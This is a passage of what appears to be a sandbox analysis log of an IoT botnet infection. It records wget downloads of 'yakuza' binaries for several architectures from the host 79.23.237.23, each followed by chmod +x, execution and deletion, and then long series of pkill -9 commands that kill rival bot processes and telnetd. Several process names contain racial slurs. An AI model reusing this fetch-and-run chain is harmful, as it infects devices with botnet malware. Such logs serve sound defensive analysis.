-
/usr/bin/pkillpkill -9 6402774⤵PID:1692
-
-
/bin/busyboxbusybox pkill -9 6402774⤵PID:1698
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵PID:1704
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵
- Reads CPU attributes
PID:1705
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵PID:1710
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
PID:1716 -
/usr/bin/pkillpkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1717
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1722
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵PID:1728
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵PID:1729
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵PID:1730
-
-
-
/bin/shsh -c "pkill -9 T || busybox pkill -9 T"3⤵PID:1740
-
/usr/bin/pkillpkill -9 T4⤵
- Reads CPU attributes
PID:1741
-
-
/bin/busyboxbusybox pkill -9 T4⤵PID:1742
-
-
-
/bin/shsh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵PID:1752
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵PID:1753
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵PID:1754
-
-
-
/bin/shsh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵PID:1764
-
/usr/bin/pkillpkill -9 6ke34⤵PID:1765
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵PID:1766
-
-
-
/bin/shsh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"3⤵PID:1778
-
/usr/bin/pkillpkill -9 TOKYO34⤵
- Reads runtime system information
PID:1779
-
-
/bin/busyboxbusybox pkill -9 TOKYO34⤵PID:1780
-
-
-
/bin/shsh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"3⤵PID:1790
-
/usr/bin/pkillpkill -9 lyEeaXul2dULCVxh4⤵PID:1791
-
-
/bin/busyboxbusybox pkill -9 lyEeaXul2dULCVxh4⤵PID:1792
-
-
-
/bin/shsh -c "pkill -9 93OfjHZ2z || busybox pkill -9 93OfjHZ2z"3⤵PID:1802
-
/usr/bin/pkillpkill -9 93OfjHZ2z4⤵PID:1803
-
-
/bin/busyboxbusybox pkill -9 93OfjHZ2z4⤵PID:1804
-
-
-
/bin/shsh -c "pkill -9 TY2gD6MZvKc7KU6r || busybox pkill -9 TY2gD6MZvKc7KU6r"3⤵PID:1813
-
/usr/bin/pkillpkill -9 TY2gD6MZvKc7KU6r4⤵PID:1814
-
-
/bin/busyboxbusybox pkill -9 TY2gD6MZvKc7KU6r4⤵PID:1816
-
-
-
-
/bin/rmrm -rf yakuza.arm62⤵PID:701
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.i6862⤵
- Writes file to tmp directory
PID:705
-
-
/bin/chmodchmod +x yakuza.i6862⤵
- File and Directory Permissions Modification
PID:712
-
-
/tmp/yakuza.i686./yakuza.i6862⤵PID:714
-
-
/bin/rmrm -rf yakuza.i6862⤵PID:716
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.ppc2⤵
- Writes file to tmp directory
PID:718
-
-
/bin/chmodchmod +x yakuza.ppc2⤵
- File and Directory Permissions Modification
PID:724
-
-
/tmp/yakuza.ppc./yakuza.ppc2⤵PID:726
-
-
/bin/rmrm -rf yakuza.ppc2⤵PID:728
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.i5862⤵
- Writes file to tmp directory
PID:729
-
-
/bin/chmodchmod +x yakuza.i5862⤵
- File and Directory Permissions Modification
PID:735
-
-
/tmp/yakuza.i586./yakuza.i5862⤵PID:737
-
-
/bin/rmrm -rf yakuza.i5862⤵PID:740
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.m68k2⤵
- Writes file to tmp directory
PID:742
-
-
/bin/chmodchmod +x yakuza.m68k2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/yakuza.m68k./yakuza.m68k2⤵PID:747
-
-
/bin/rmrm -rf yakuza.m68k2⤵PID:750
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm42⤵
- Writes file to tmp directory
PID:752
-
-
/bin/chmodchmod +x yakuza.arm42⤵
- File and Directory Permissions Modification
PID:758
-
-
/tmp/yakuza.arm4./yakuza.arm42⤵PID:759
-
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵PID:764
-
/usr/bin/pkillpkill -9 902i134⤵PID:765
-
-
/bin/busyboxbusybox pkill -9 902i134⤵PID:771
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵PID:787
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵PID:789
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:802
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵PID:815
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵PID:820
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵PID:823
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵PID:835
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵
- Reads CPU attributes
PID:839
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵PID:841
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵PID:848
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵PID:849
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵PID:855
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:871
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:873
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:879
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:895
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵PID:897
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:902
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵PID:913
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵PID:915
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵PID:919
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵PID:926
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵PID:928
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵PID:932
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵PID:940
-
/usr/bin/pkillpkill -9 scansh44⤵
- Reads CPU attributes
PID:941
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵PID:945
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵PID:952
-
/usr/bin/pkillpkill -9 MDMA4⤵
- Reads runtime system information
PID:954
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵PID:957
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵PID:965
-
/usr/bin/pkillpkill -9 fdevalvex4⤵PID:966
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵PID:970
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵PID:978
-
/usr/bin/pkillpkill -9 scanspc4⤵PID:982
-
-
/bin/busyboxbusybox pkill -9 scanspc4⤵PID:987
-
-
-
/bin/shsh -c "pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ"3⤵PID:995
-
/usr/bin/pkillpkill -9 MELTEDNINJAREALZ4⤵
- Reads CPU attributes
PID:996
-
-
/bin/busyboxbusybox pkill -9 MELTEDNINJAREALZ4⤵PID:1001
-
-
-
/bin/shsh -c "pkill -9 flexsonskids || busybox pkill -9 flexsonskids"3⤵PID:1008
-
/usr/bin/pkillpkill -9 flexsonskids4⤵PID:1011
-
-
/bin/busyboxbusybox pkill -9 flexsonskids4⤵PID:1015
-
-
-
/bin/shsh -c "pkill -9 scanx86 || busybox pkill -9 scanx86"3⤵PID:1021
-
/usr/bin/pkillpkill -9 scanx864⤵PID:1023
-
-
/bin/busyboxbusybox pkill -9 scanx864⤵PID:1027
-
-
-
/bin/shsh -c "pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL"3⤵PID:1033
-
/usr/bin/pkillpkill -9 MISAKI-U79OL4⤵
- Reads runtime system information
PID:1036
-
-
/bin/busyboxbusybox pkill -9 MISAKI-U79OL4⤵PID:1040
-
-
-
/bin/shsh -c "pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe"3⤵PID:1047
-
/usr/bin/pkillpkill -9 foAxi102kxe4⤵
- Reads runtime system information
PID:1050
-
-
/bin/busyboxbusybox pkill -9 foAxi102kxe4⤵PID:1053
-
-
-
/bin/shsh -c "pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj"3⤵PID:1059
-
/usr/bin/pkillpkill -9 swodjwodjwoj4⤵PID:1061
-
-
/bin/busyboxbusybox pkill -9 swodjwodjwoj4⤵PID:1066
-
-
-
/bin/shsh -c "pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l"3⤵PID:1069
-
/usr/bin/pkillpkill -9 MmKiy7f87l4⤵
- Reads runtime system information
PID:1071
-
-
/bin/busyboxbusybox pkill -9 MmKiy7f87l4⤵PID:1074
-
-
-
/bin/shsh -c "pkill -9 freecookiex86 || busybox pkill -9 freecookiex86"3⤵PID:1083
-
/usr/bin/pkillpkill -9 freecookiex864⤵PID:1085
-
-
/bin/busyboxbusybox pkill -9 freecookiex864⤵PID:1092
-
-
-
/bin/shsh -c "pkill -9 sysgpu || busybox pkill -9 sysgpu"3⤵PID:1098
-
/usr/bin/pkillpkill -9 sysgpu4⤵
- Reads CPU attributes
PID:1099
-
-
/bin/busyboxbusybox pkill -9 sysgpu4⤵PID:1103
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:1110
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:1111
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:1112
-
-
-
/bin/shsh -c "pkill -9 frgege || busybox pkill -9 frgege"3⤵PID:1122
-
/usr/bin/pkillpkill -9 frgege4⤵PID:1123
-
-
/bin/busyboxbusybox pkill -9 frgege4⤵PID:1124
-
-
-
/bin/shsh -c "pkill -9 sysupdater || busybox pkill -9 sysupdater"3⤵PID:1134
-
/usr/bin/pkillpkill -9 sysupdater4⤵PID:1135
-
-
/bin/busyboxbusybox pkill -9 sysupdater4⤵PID:1136
-
-
-
/bin/shsh -c "pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd"3⤵PID:1146
-
/usr/bin/pkillpkill -9 0DnAzepd4⤵PID:1147
-
-
/bin/busyboxbusybox pkill -9 0DnAzepd4⤵PID:1148
-
-
-
/bin/shsh -c "pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69"3⤵PID:1157
-
/usr/bin/pkillpkill -9 NiGGeRD0nks694⤵
- Reads CPU attributes
PID:1159
-
-
/bin/busyboxbusybox pkill -9 NiGGeRD0nks694⤵PID:1160
-
-
-
/bin/shsh -c "pkill -9 frgreu || busybox pkill -9 frgreu"3⤵PID:1166
-
/usr/bin/pkillpkill -9 frgreu4⤵
- Reads runtime system information
PID:1168
-
-
/bin/busyboxbusybox pkill -9 frgreu4⤵PID:1174
-
-
-
/bin/shsh -c "pkill -9 telnetd || busybox pkill -9 telnetd"3⤵PID:1181
-
/usr/bin/pkillpkill -9 telnetd4⤵PID:1186
-
-
/bin/busyboxbusybox pkill -9 telnetd4⤵PID:1187
-
-
-
/bin/shsh -c "pkill -9 0x766f6964 || busybox pkill -9 0x766f6964"3⤵PID:1193
-
/usr/bin/pkillpkill -9 0x766f69644⤵PID:1196
-
-
/bin/busyboxbusybox pkill -9 0x766f69644⤵PID:1199
-
-
-
/bin/shsh -c "pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337"3⤵PID:1205
-
/usr/bin/pkillpkill -9 NiGGeRd0nks13374⤵PID:1206
-
-
/bin/busyboxbusybox pkill -9 NiGGeRd0nks13374⤵PID:1211
-
-
-
/bin/shsh -c "pkill -9 gaft || busybox pkill -9 gaft"3⤵PID:1217
-
/usr/bin/pkillpkill -9 gaft4⤵
- Reads CPU attributes
PID:1218
-
-
/bin/busyboxbusybox pkill -9 gaft4⤵PID:1219
-
-
-
/bin/shsh -c "pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa"3⤵PID:1229
-
/usr/bin/pkillpkill -9 urasgbsigboa4⤵PID:1230
-
-
/bin/busyboxbusybox pkill -9 urasgbsigboa4⤵PID:1231
-
-
-
/bin/shsh -c "pkill -9 120i3UI49 || busybox pkill -9 120i3UI49"3⤵PID:1241
-
/usr/bin/pkillpkill -9 120i3UI494⤵
- Reads CPU attributes
PID:1242
-
-
/bin/busyboxbusybox pkill -9 120i3UI494⤵PID:1243
-
-
-
/bin/shsh -c "pkill -9 OaF3 || busybox pkill -9 OaF3"3⤵PID:1251
-
/usr/bin/pkillpkill -9 OaF34⤵PID:1252
-
-
/bin/busyboxbusybox pkill -9 OaF34⤵PID:1255
-
-
-
/bin/shsh -c "pkill -9 geae || busybox pkill -9 geae"3⤵PID:1262
-
/usr/bin/pkillpkill -9 geae4⤵PID:1264
-
-
/bin/busyboxbusybox pkill -9 geae4⤵PID:1269
-
-
-
/bin/shsh -c "pkill -9 vaiolmao || busybox pkill -9 vaiolmao"3⤵PID:1276
-
/usr/bin/pkillpkill -9 vaiolmao4⤵PID:1277
-
-
/bin/busyboxbusybox pkill -9 vaiolmao4⤵PID:1280
-
-
-
/bin/shsh -c "pkill -9 123123a || busybox pkill -9 123123a"3⤵PID:1287
-
/usr/bin/pkillpkill -9 123123a4⤵PID:1289
-
-
/bin/busyboxbusybox pkill -9 123123a4⤵PID:1294
-
-
-
/bin/shsh -c "pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D"3⤵PID:1300
-
/usr/bin/pkillpkill -9 Ofurain0n4H34D4⤵PID:1301
-
-
/bin/busyboxbusybox pkill -9 Ofurain0n4H34D4⤵PID:1303
-
-
-
/bin/shsh -c "pkill -9 ggTrex || busybox pkill -9 ggTrex"3⤵PID:1312
-
/usr/bin/pkillpkill -9 ggTrex4⤵PID:1313
-
-
/bin/busyboxbusybox pkill -9 ggTrex4⤵PID:1314
-
-
-
/bin/shsh -c "pkill -9 wasads || busybox pkill -9 wasads"3⤵PID:1324
-
/usr/bin/pkillpkill -9 wasads4⤵
- Reads CPU attributes
PID:1325
-
-
/bin/busyboxbusybox pkill -9 wasads4⤵PID:1326
-
-
-
/bin/shsh -c "pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD"3⤵PID:1336
-
/usr/bin/pkillpkill -9 1293194hjXD4⤵
- Reads CPU attributes
PID:1337
-
-
/bin/busyboxbusybox pkill -9 1293194hjXD4⤵PID:1338
-
-
-
/bin/shsh -c "pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn"3⤵PID:1348
-
/usr/bin/pkillpkill -9 OthLaLosn4⤵PID:1349
-
-
/bin/busyboxbusybox pkill -9 OthLaLosn4⤵PID:1350
-
-
-
/bin/shsh -c "pkill -9 ggt || busybox pkill -9 ggt"3⤵PID:1359
-
/usr/bin/pkillpkill -9 ggt4⤵PID:1360
-
-
/bin/busyboxbusybox pkill -9 ggt4⤵PID:1362
-
-
-
/bin/shsh -c "pkill -9 wget-log || busybox pkill -9 wget-log"3⤵PID:1372
-
/usr/bin/pkillpkill -9 wget-log4⤵PID:1374
-
-
/bin/busyboxbusybox pkill -9 wget-log4⤵PID:1376
-
-
-
/bin/shsh -c "pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER"3⤵PID:1385
-
/usr/bin/pkillpkill -9 1337SoraLOADER4⤵PID:1386
-
-
/bin/busyboxbusybox pkill -9 1337SoraLOADER4⤵PID:1388
-
-
-
/bin/shsh -c "pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA"3⤵PID:1396
-
/usr/bin/pkillpkill -9 SAIAKINA4⤵PID:1398
-
-
/bin/busyboxbusybox pkill -9 SAIAKINA4⤵PID:1400
-
-
-
/bin/shsh -c "pkill -9 ggtq || busybox pkill -9 ggtq"3⤵PID:1407
-
/usr/bin/pkillpkill -9 ggtq4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1409
-
-
/bin/busyboxbusybox pkill -9 ggtq4⤵PID:1411
-
-
-
/bin/shsh -c "pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2"3⤵PID:1419
-
/usr/bin/pkillpkill -9 1378bfp919GRB1Q24⤵
- Reads runtime system information
PID:1420
-
-
/bin/busyboxbusybox pkill -9 1378bfp919GRB1Q24⤵PID:1423
-
-
-
/bin/shsh -c "pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO"3⤵PID:1431
-
/usr/bin/pkillpkill -9 SAIAKUSO4⤵PID:1433
-
-
/bin/busyboxbusybox pkill -9 SAIAKUSO4⤵PID:1436
-
-
-
/bin/shsh -c "pkill -9 ggtr || busybox pkill -9 ggtr"3⤵PID:1444
-
/usr/bin/pkillpkill -9 ggtr4⤵PID:1446
-
-
/bin/busyboxbusybox pkill -9 ggtr4⤵PID:1448
-
-
-
/bin/shsh -c "pkill -9 14Fa || busybox pkill -9 14Fa"3⤵PID:1455
-
/usr/bin/pkillpkill -9 14Fa4⤵PID:1457
-
-
/bin/busyboxbusybox pkill -9 14Fa4⤵PID:1460
-
-
-
/bin/shsh -c "pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337"3⤵PID:1470
-
/usr/bin/pkillpkill -9 SEXSLAVE13374⤵PID:1472
-
-
/bin/busyboxbusybox pkill -9 SEXSLAVE13374⤵PID:1477
-
-
-
/bin/shsh -c "pkill -9 ggtt || busybox pkill -9 ggtt"3⤵PID:1483
-
/usr/bin/pkillpkill -9 ggtt4⤵PID:1484
-
-
/bin/busyboxbusybox pkill -9 ggtt4⤵PID:1490
-
-
-
/bin/shsh -c "pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4"3⤵PID:1495
-
/usr/bin/pkillpkill -9 1902a3u912u3u44⤵PID:1496
-
-
/bin/busyboxbusybox pkill -9 1902a3u912u3u44⤵PID:1502
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:1508
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵
- Reads runtime system information
PID:1509
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:1510
-
-
-
/bin/shsh -c "pkill -9 haetrghbr || busybox pkill -9 haetrghbr"3⤵PID:1520
-
/usr/bin/pkillpkill -9 haetrghbr4⤵PID:1521
-
-
/bin/busyboxbusybox pkill -9 haetrghbr4⤵PID:1522
-
-
-
/bin/shsh -c "pkill -9 19ju3d || busybox pkill -9 19ju3d"3⤵PID:1532
-
/usr/bin/pkillpkill -9 19ju3d4⤵PID:1533
-
-
/bin/busyboxbusybox pkill -9 19ju3d4⤵PID:1534
-
-
-
/bin/shsh -c "pkill -9 SORAojkf120 || busybox pkill -9 SORAojkf120"3⤵PID:1544
-
/usr/bin/pkillpkill -9 SORAojkf1204⤵
- Reads CPU attributes
- Reads runtime system information
PID:1545
-
-
/bin/busyboxbusybox pkill -9 SORAojkf1204⤵PID:1546
-
-
-
/bin/shsh -c "pkill -9 hehahejeje92 || busybox pkill -9 hehahejeje92"3⤵PID:1556
-
/usr/bin/pkillpkill -9 hehahejeje924⤵
- Reads runtime system information
PID:1557
-
-
/bin/busyboxbusybox pkill -9 hehahejeje924⤵PID:1558
-
-
-
/bin/shsh -c "pkill -9 2U2JDJA901F91 || busybox pkill -9 2U2JDJA901F91"3⤵PID:1569
-
/usr/bin/pkillpkill -9 2U2JDJA901F914⤵PID:1570
-
-
/bin/busyboxbusybox pkill -9 2U2JDJA901F914⤵PID:1572
-
-
-
/bin/shsh -c "pkill -9 SlaVLav12 || busybox pkill -9 SlaVLav12"3⤵PID:1580
-
/usr/bin/pkillpkill -9 SlaVLav124⤵
- Reads runtime system information
PID:1581
-
-
/bin/busyboxbusybox pkill -9 SlaVLav124⤵PID:1584
-
-
-
/bin/shsh -c "pkill -9 helpmedaddthhhhh || busybox pkill -9 helpmedaddthhhhh"3⤵PID:1593
-
/usr/bin/pkillpkill -9 helpmedaddthhhhh4⤵
- Reads CPU attributes
PID:1594
-
-
/bin/busyboxbusybox pkill -9 helpmedaddthhhhh4⤵PID:1596
-
-
-
/bin/shsh -c "pkill -9 2wgg9qphbq || busybox pkill -9 2wgg9qphbq"3⤵PID:1605
-
/usr/bin/pkillpkill -9 2wgg9qphbq4⤵
- Reads runtime system information
PID:1606
-
-
/bin/busyboxbusybox pkill -9 2wgg9qphbq4⤵PID:1608
-
-
-
/bin/shsh -c "pkill -9 Slav3Th3seD3vices || busybox pkill -9 Slav3Th3seD3vices"3⤵PID:1617
-
/usr/bin/pkillpkill -9 Slav3Th3seD3vices4⤵PID:1618
-
-
/bin/busyboxbusybox pkill -9 Slav3Th3seD3vices4⤵PID:1620
-
-
-
/bin/shsh -c "pkill -9 hzSmYZjYMQ || busybox pkill -9 hzSmYZjYMQ"3⤵PID:1629
-
/usr/bin/pkillpkill -9 hzSmYZjYMQ4⤵PID:1630
-
-
/bin/busyboxbusybox pkill -9 hzSmYZjYMQ4⤵PID:1632
-
-
-
/bin/shsh -c "pkill -9 5Gbf || busybox pkill -9 5Gbf"3⤵PID:1641
-
/usr/bin/pkillpkill -9 5Gbf4⤵PID:1642
-
-
/bin/busyboxbusybox pkill -9 5Gbf4⤵PID:1644
-
-
-
/bin/shsh -c "pkill -9 SoRAxD123LOL || busybox pkill -9 SoRAxD123LOL"3⤵PID:1653
-
/usr/bin/pkillpkill -9 SoRAxD123LOL4⤵PID:1654
-
-
/bin/busyboxbusybox pkill -9 SoRAxD123LOL4⤵PID:1655
-
-
-
/bin/shsh -c "pkill -9 iaGv || busybox pkill -9 iaGv"3⤵PID:1663
-
/usr/bin/pkillpkill -9 iaGv4⤵PID:1665
-
-
/bin/busyboxbusybox pkill -9 iaGv4⤵PID:1669
-
-
-
/bin/shsh -c "pkill -9 5aA3 || busybox pkill -9 5aA3"3⤵PID:1677
-
/usr/bin/pkillpkill -9 5aA34⤵PID:1678
-
-
/bin/busyboxbusybox pkill -9 5aA34⤵PID:1681
-
-
-
/bin/shsh -c "pkill -9 SoRAxD420LOL || busybox pkill -9 SoRAxD420LOL"3⤵PID:1689
-
/usr/bin/pkillpkill -9 SoRAxD420LOL4⤵PID:1690
-
-
/bin/busyboxbusybox pkill -9 SoRAxD420LOL4⤵PID:1693
-
-
-
/bin/shsh -c "pkill -9 insomni || busybox pkill -9 insomni"3⤵PID:1701
-
/usr/bin/pkillpkill -9 insomni4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1702
-
-
/bin/busyboxbusybox pkill -9 insomni4⤵PID:1703
-
-
-
/bin/shsh -c "pkill -9 640277 || busybox pkill -9 640277"3⤵PID:1713
-
/usr/bin/pkillpkill -9 6402774⤵PID:1714
-
-
/bin/busyboxbusybox pkill -9 6402774⤵PID:1715
-
-
-
/bin/shsh -c "pkill -9 SoraBeReppin1337 || busybox pkill -9 SoraBeReppin1337"3⤵PID:1724
-
/usr/bin/pkillpkill -9 SoraBeReppin13374⤵PID:1725
-
-
/bin/busyboxbusybox pkill -9 SoraBeReppin13374⤵PID:1727
-
-
-
/bin/shsh -c "pkill -9 ipcamCache || busybox pkill -9 ipcamCache"3⤵
- System Network Configuration Discovery
PID:1736 -
/usr/bin/pkillpkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1737
-
-
/bin/busyboxbusybox pkill -9 ipcamCache4⤵
- System Network Configuration Discovery
PID:1739
-
-
-
/bin/shsh -c "pkill -9 66tlGg9Q || busybox pkill -9 66tlGg9Q"3⤵PID:1748
-
/usr/bin/pkillpkill -9 66tlGg9Q4⤵PID:1749
-
-
/bin/busyboxbusybox pkill -9 66tlGg9Q4⤵PID:1751
-
-
-
/bin/shsh -c "pkill -9 T || busybox pkill -9 T"3⤵PID:1760
-
/usr/bin/pkillpkill -9 T4⤵PID:1761
-
-
/bin/busyboxbusybox pkill -9 T4⤵PID:1763
-
-
-
/bin/shsh -c "pkill -9 jUYfouyf87 || busybox pkill -9 jUYfouyf87"3⤵PID:1774
-
/usr/bin/pkillpkill -9 jUYfouyf874⤵
- Reads CPU attributes
PID:1776
-
-
/bin/busyboxbusybox pkill -9 jUYfouyf874⤵PID:1777
-
-
-
/bin/shsh -c "pkill -9 6ke3 || busybox pkill -9 6ke3"3⤵PID:1786
-
/usr/bin/pkillpkill -9 6ke34⤵PID:1787
-
-
/bin/busyboxbusybox pkill -9 6ke34⤵PID:1789
-
-
-
/bin/shsh -c "pkill -9 TOKYO3 || busybox pkill -9 TOKYO3"3⤵PID:1798
-
/usr/bin/pkillpkill -9 TOKYO34⤵PID:1799
-
-
/bin/busyboxbusybox pkill -9 TOKYO34⤵PID:1801
-
-
-
/bin/shsh -c "pkill -9 lyEeaXul2dULCVxh || busybox pkill -9 lyEeaXul2dULCVxh"3⤵PID:1810
-
/usr/bin/pkillpkill -9 lyEeaXul2dULCVxh4⤵
- Reads runtime system information
PID:1811
-
-
/bin/busyboxbusybox pkill -9 lyEeaXul2dULCVxh4⤵PID:1815
-
-
-
-
/bin/rmrm -rf yakuza.arm42⤵PID:761
-
-
/usr/bin/wgetwget http://79.23.237.23/yakuza.arm52⤵
- Writes file to tmp directory
PID:766
-
-
/bin/chmodchmod +x yakuza.arm52⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/yakuza.arm5./yakuza.arm52⤵PID:775
-
/bin/shsh -c "pkill -9 902i13 || busybox pkill -9 902i13"3⤵PID:780
-
/usr/bin/pkillpkill -9 902i134⤵
- Reads CPU attributes
PID:781
-
-
/bin/busyboxbusybox pkill -9 902i134⤵PID:784
-
-
-
/bin/shsh -c "pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY"3⤵PID:804
-
/usr/bin/pkillpkill -9 BzSxLxBxeY4⤵PID:805
-
-
/bin/busyboxbusybox pkill -9 BzSxLxBxeY4⤵PID:812
-
-
-
/bin/shsh -c "pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7"3⤵PID:831
-
/usr/bin/pkillpkill -9 HOHO-LUGO74⤵PID:833
-
-
/bin/busyboxbusybox pkill -9 HOHO-LUGO74⤵PID:840
-
-
-
/bin/shsh -c "pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL"3⤵PID:846
-
/usr/bin/pkillpkill -9 HOHO-U79OL4⤵PID:847
-
-
/bin/busyboxbusybox pkill -9 HOHO-U79OL4⤵PID:852
-
-
-
/bin/shsh -c "pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87"3⤵PID:869
-
/usr/bin/pkillpkill -9 JuYfouyf874⤵PID:872
-
-
/bin/busyboxbusybox pkill -9 JuYfouyf874⤵PID:878
-
-
-
/bin/shsh -c "pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd"3⤵PID:894
-
/usr/bin/pkillpkill -9 NiGGeR69xd4⤵PID:898
-
-
/bin/busyboxbusybox pkill -9 NiGGeR69xd4⤵PID:903
-
-
-
/bin/shsh -c "pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X"3⤵PID:914
-
/usr/bin/pkillpkill -9 SO190Ij1X4⤵PID:916
-
-
/bin/busyboxbusybox pkill -9 SO190Ij1X4⤵PID:918
-
-
-
/bin/shsh -c "pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE"3⤵PID:927
-
/usr/bin/pkillpkill -9 LOLKIKEEEDDE4⤵PID:929
-
-
/bin/busyboxbusybox pkill -9 LOLKIKEEEDDE4⤵PID:931
-
-
-
/bin/shsh -c "pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e"3⤵PID:938
-
/usr/bin/pkillpkill -9 ekjheory98e4⤵PID:939
-
-
/bin/busyboxbusybox pkill -9 ekjheory98e4⤵PID:942
-
-
-
/bin/shsh -c "pkill -9 scansh4 || busybox pkill -9 scansh4"3⤵PID:950
-
/usr/bin/pkillpkill -9 scansh44⤵PID:951
-
-
/bin/busyboxbusybox pkill -9 scansh44⤵PID:956
-
-
-
/bin/shsh -c "pkill -9 MDMA || busybox pkill -9 MDMA"3⤵PID:962
-
/usr/bin/pkillpkill -9 MDMA4⤵PID:963
-
-
/bin/busyboxbusybox pkill -9 MDMA4⤵PID:964
-
-
-
/bin/shsh -c "pkill -9 fdevalvex || busybox pkill -9 fdevalvex"3⤵PID:974
-
/usr/bin/pkillpkill -9 fdevalvex4⤵PID:975
-
-
/bin/busyboxbusybox pkill -9 fdevalvex4⤵PID:976
-
-
-
/bin/shsh -c "pkill -9 scanspc || busybox pkill -9 scanspc"3⤵PID:989
-
